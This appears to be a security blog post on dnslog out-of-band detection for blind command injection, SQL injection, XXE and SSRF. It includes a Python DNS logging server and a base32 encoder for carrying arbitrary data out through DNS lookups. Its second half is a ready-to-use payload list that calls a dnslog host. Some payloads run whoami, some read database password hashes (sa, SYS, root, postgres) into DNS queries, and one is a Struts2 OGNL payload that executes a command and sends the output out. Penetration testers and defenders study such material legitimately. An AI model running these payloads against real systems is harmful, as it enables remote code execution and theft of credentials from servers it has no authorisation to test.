0x00 Why this post: a question about RCE with no echo came up in the wb online interview, and this fills that gap.
0x10 A few commonly used dnslog platforms
1 http://ceye.io/
2 http://www.dnslog.cn/
3 https://github.com/BugScanTeam/DNSLog (open source, can be self-hosted)
0x20 What a dnslog platform is for
Many vulnerabilities today give no echo: the payload executes, but nothing in the response tells us so. To confirm that the vulnerability exists we therefore use a third-party dnslog platform. The platform is the authoritative nameserver for a domain and records every lookup of a name under that domain, so if the target resolves (or fetches over HTTP) a name we chose, that request is proof the payload ran, and anything we put in the leading labels of the name comes back to us in the platform's log. dnslog is mainly used with the following kinds of vulnerabilities:
1 rce
2 ssrf
3 blind sql
4 ...
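To make the platform's role concrete, here is an added example of the minimal server such a platform runs: a UDP listener that parses each raw DNS query, keeps only names under its own zone, records the leading labels (the part a payload controls) and answers with an A record so HTTP-based payloads can continue. This is illustrative code written for this post, not code from ceye.io, dnslog.cn or the BugScanTeam/DNSLog project; the zone name dnslog.example.com and all function names are assumptions, and build_query exists only to construct test packets offline.

```python
import socket
import struct
import time

# Zone this listener answers for. Hypothetical name: delegate a domain you own
# (NS record) to the host running this script and replace it.
DNSLOG_DOMAIN = "dnslog.example.com"


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Encode a standard recursive query for `name`. Used here to construct
    test packets; a resolver sends exactly this shape on behalf of ping/curl."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack(">HH", qtype, 1)


def parse_qname(packet: bytes, offset: int = 12):
    """Return (name, offset_after_name) for the first question's QNAME.
    Question names are never compressed, so a pointer byte (top two bits set)
    is treated as malformed rather than followed."""
    labels = []
    while True:
        if offset >= len(packet):
            raise ValueError("truncated DNS packet")
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def exfil_labels(qname: str, zone: str = DNSLOG_DOMAIN):
    """The labels a payload prepended to our zone, or None if the query is
    for some other name (stray traffic hitting the server)."""
    q, z = qname.lower().rstrip("."), zone.lower()
    if q == z:
        return ""
    return q[:-len(z) - 1] if q.endswith("." + z) else None


def build_response(query: bytes, question_end: int, ip: str = "127.0.0.1") -> bytes:
    """Answer an in-zone query with a single A record (TTL 0 so nothing is cached
    and every repeated payload produces a fresh log entry)."""
    header = query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0)  # QR, RD, RA; 1 question, 1 answer
    question = query[12:question_end]
    answer = (struct.pack(">H", 0xC00C)             # name: pointer to QNAME at offset 12
              + struct.pack(">HHIH", 1, 1, 0, 4)    # type A, class IN, TTL 0, RDLENGTH 4
              + socket.inet_aton(ip))
    return header + question + answer


def handle_packet(packet: bytes, src: str, now=None):
    """Parse one datagram; return (log_record, response) or (None, None) if
    the query is not for our zone. Raises ValueError on malformed input."""
    name, off = parse_qname(packet)
    if len(packet) < off + 4:
        raise ValueError("truncated question section")
    qtype, _qclass = struct.unpack(">HH", packet[off:off + 4])
    data = exfil_labels(name)
    if data is None:
        return None, None
    record = {"time": time.time() if now is None else now, "src": src,
              "qname": name, "qtype": qtype, "data": data}
    return record, build_response(packet, off + 4)


def serve(bind=("0.0.0.0", 53)):
    """Run as the zone's nameserver and print every in-zone lookup."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        packet, peer = sock.recvfrom(512)
        try:
            record, reply = handle_packet(packet, peer[0])
        except ValueError as exc:
            print(f"malformed packet from {peer[0]}: {exc}")
            continue
        if record is not None:
            print(f"{record['src']} looked up {record['qname']} (data={record['data']!r})")
            sock.sendto(reply, peer)


if __name__ == "__main__":
    serve()
```

The source address in the log is the target's recursive resolver, not the target itself; the proof of execution is the name, which only the payload could have produced. The listener deliberately does not follow compression pointers or parse anything beyond the question, since it receives untrusted packets from the whole Internet.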
0x30 How to use dnslog
ceye.io is used as the example here.
Testing on the author's Windows system, ping `whoami`.1u2gcq.ceye.io did not work; the result was "could not find host". That is expected: backtick command substitution is a feature of Unix shells, and cmd.exe passes the backticks through literally, so the resulting name is not a valid hostname and is never looked up.
curl http://1u2gcq.ceye.io/whoami does not reveal the current user's identity either: whoami there is just a literal path string, nothing executes it.
The only form that worked:
ping %os%.12345.ceye.io
cmd.exe expands %VAR% for environment variables (%OS%, %USERNAME%, %COMPUTERNAME%), so the value lands in the queried name. This works when the expanded value is itself a valid DNS name; a value containing backslashes, spaces or colons, or a label longer than 63 characters (%PATH%, for instance), produces a name the resolver never sends. Variables that exist only in the invoking shell's scope, rather than in the process environment the injected command inherits, may also fail to expand.
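The "valid DNS name" restriction above is the real limit of the ping trick, so here is an added example (written for this post, not part of the original or of any dnslog platform) of how a payload gets around it: arbitrary bytes, such as a DOMAIN\user string from whoami or a long hash, are base32-encoded (DNS is case-insensitive, so base64 would be corrupted), cut into labels of at most 63 characters, numbered, and sent as several lookups; the decoder on the listener side reorders, dedupes and reassembles them. It also goes slightly beyond the text with is_dns_safe, a check for whether a value can be used as-is the way %os% was. The zone name 1u2gcq.dnslog.example.com and the function names are assumptions; the data in the test is constructed.

```python
import base64
import re

# Hypothetical token.zone; substitute the identifier your dnslog platform gave you.
DNSLOG_DOMAIN = "1u2gcq.dnslog.example.com"
LABEL_MAX = 63     # RFC 1035 label limit
NAME_MAX = 253     # practical limit for a full name
LABEL_RE = re.compile(r"[A-Za-z0-9_-]{1,63}")


def is_dns_safe(value: str) -> bool:
    """Whether `value` survives unchanged as part of a name the resolver will
    actually send: letters, digits, '-' and '_' only, labels of 1..63 chars,
    total length <= 253. 'Windows_NT' passes; 'DESKTOP-ABC\\admin' does not."""
    return len(value) <= NAME_MAX and all(LABEL_RE.fullmatch(l) for l in value.split("."))


def encode_queries(data: bytes, zone: str = DNSLOG_DOMAIN, labels_per_query: int = 2):
    """Turn arbitrary bytes into a list of names to look up. Each name is
    <seq>.<label>[.<label>].<zone>; the sequence number lets the receiver
    reorder lookups that arrive out of order, duplicated, or via different resolvers."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + LABEL_MAX] for i in range(0, len(b32), LABEL_MAX)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([str(seq)] + labels[i:i + labels_per_query] + [zone])
        if len(name) > NAME_MAX:
            raise ValueError("lower labels_per_query: name exceeds 253 characters")
        queries.append(name)
    return queries


def decode_queries(qnames, zone: str = DNSLOG_DOMAIN) -> bytes:
    """Reassemble the original bytes from logged query names. Names outside
    the zone, and names without a numeric sequence label, are ignored."""
    chunks = {}
    z = zone.lower()
    for q in qnames:
        q = q.lower().rstrip(".")
        if not q.endswith("." + z):
            continue
        parts = q[:-len(z) - 1].split(".")
        try:
            seq = int(parts[0])
        except ValueError:
            continue
        chunks.setdefault(seq, "".join(parts[1:]))   # first copy wins; duplicates dropped
    b32 = "".join(chunks[s] for s in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)                      # restore the padding we stripped
    return base64.b32decode(b32)


if __name__ == "__main__":
    # Constructed sample: a Windows whoami result that the bare ping trick cannot carry.
    sample = b"DESKTOP-ABC\\Administrator"
    print(is_dns_safe(sample.decode()))               # False: backslash
    for name in encode_queries(sample):
        print("ping -n 1", name)                      # what the injected command would run
    print(decode_queries(encode_queries(sample)))
```

On a Unix target the same scheme is a one-liner around base32 and split; on Windows, where no base32 tool is available by default, a certutil -encodehex or PowerShell equivalent is needed. Keep labels_per_query small when the zone name is long so every name stays under 253 characters.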
Below are some public payloads (the ip.port.b182oj.ceye.io names are ceye.io's documentation placeholders; replace b182oj with your own identifier).
0x00 Command Execution
i. *nix
    curl http://ip.port.b182oj.ceye.io/`whoami`
    ping `whoami`.ip.port.b182oj.ceye.io
ii. Windows
    ping %USERNAME%.b182oj.ceye.io
0x01 SQL Injection
i. SQL Server (xp_dirtree on a UNC path forces the server to resolve the host part, hence the DNS query)
    DECLARE @host varchar(1024);
    SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.ip.port.b182oj.ceye.io';
    EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
    Note that a single DNS label cannot exceed 63 characters; a modern password_hash is far longer than that in hex, so send it in pieces with SUBSTRING.
ii. Oracle
    SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
    SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
    SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
    SELECT DBMS_LDAP.INIT('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
    SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
iii. MySQL (LOAD_FILE on a UNC path; only resolves when MySQL runs on Windows and secure_file_priv does not block LOAD_FILE)
    SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
iv. PostgreSQL (COPY FROM a UNC path, likewise a Windows host)
    DROP TABLE IF EXISTS table_output;
    CREATE TABLE table_output(content text);
    CREATE OR REPLACE FUNCTION temp_function()
    RETURNS VOID AS $$
    DECLARE exec_cmd TEXT;
    DECLARE query_result TEXT;
    BEGIN
    SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
    exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
    EXECUTE exec_cmd;
    END;
    $$ LANGUAGE plpgsql SECURITY DEFINER;
    SELECT temp_function();
0x02 XML Entity Injection (the parser fetches the parameter entity's SYSTEM URL while processing the DTD, before any output is produced)
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
    %remote;]>
    <root/>
0x03 Others
i. Struts2
    xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
    xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
ii. FFMpeg (HLS playlist; the concat: entry makes ffmpeg fetch the URL)
    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:10.0,
    concat:http://ip.port.b182oj.ceye.io
    #EXT-X-ENDLIST
iii. Weblogic
    xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
iv. ImageMagick (MVG file)
    push graphic-context
    viewbox 0 0 640 480
    fill 'url(http://ip.port.b182oj.ceye.io)'
    pop graphic-context
v. Resin
    xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
vi. Discuz
    http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo